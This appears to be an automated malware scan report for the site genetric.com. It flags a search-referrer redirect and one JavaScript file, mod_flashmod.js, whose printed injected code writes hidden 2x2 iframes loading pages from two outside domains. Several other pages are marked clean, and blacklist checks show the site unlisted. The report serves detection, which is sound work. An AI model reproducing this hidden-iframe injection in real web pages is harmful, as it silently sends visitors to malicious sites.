Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://genetric.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: genetric.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Fri, 22 May 2015 12:16:48 GMT Location: http://candice-accola.org/mocf.html?h=725350 Server: Apache Vary: Accept-Encoding Content-Length: 228 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://genetric.com/ | 200 OK Content-Length: 17393 Content-Type: text/html | clean |
http://genetric.com/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://genetric.com/modules/mod_flashmod/mod_flashmod.js | 200 OK Content-Length: 4093 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=725350></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globetask.com/wwad.html?j=725350></iframe>'); function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else < case "class": case "title": case "accesskey": case "name": case "id": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://globetask.com/wwad.html?j=725350 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globetask.com/wwad.html?j=725350> Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=725350 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=725350> | ||
http://genetric.com/templates/gk_finance_com/lib/scripts/template_scripts.js | 200 OK Content-Length: 6453 Content-Type: application/javascript | clean |
http://genetric.com/templates/gk_finance_com/lib/scripts/menu.php?width=1&height=1&opacity=1&animation=1&speed=180 | 200 OK Content-Length: 2892 Content-Type: text/javascript | clean |
http://genetric.com/./ | 403 Forbidden Content-Length: 102 Content-Type: text/html | clean |
http://genetric.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://genetric.com/solutions.html | 200 OK Content-Length: 17678 Content-Type: text/html | clean |
http://genetric.com/solutions/unified-communication.html | 200 OK Content-Length: 18700 Content-Type: text/html | clean |
http://genetric.com/solutions/network-security.html | 200 OK Content-Length: 18361 Content-Type: text/html | clean |
http://genetric.com/solutions/wimax--wifi.html | 200 OK Content-Length: 18375 Content-Type: text/html | clean |
http://genetric.com/solutions/campus-networks.html | 200 OK Content-Length: 18468 Content-Type: text/html | clean |
http://genetric.com/solutions/ip-telephony.html | 200 OK Content-Length: 18807 Content-Type: text/html | clean |
http://genetric.com/solutions/mobile-voip.html | 200 OK Content-Length: 19011 Content-Type: text/html | clean |
http://genetric.com/services.html | 200 OK Content-Length: 17768 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=genetric.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://genetric.com/
Result: genetric.com is not infected or malware details are not published yet.
Result: genetric.com is not infected or malware details are not published yet.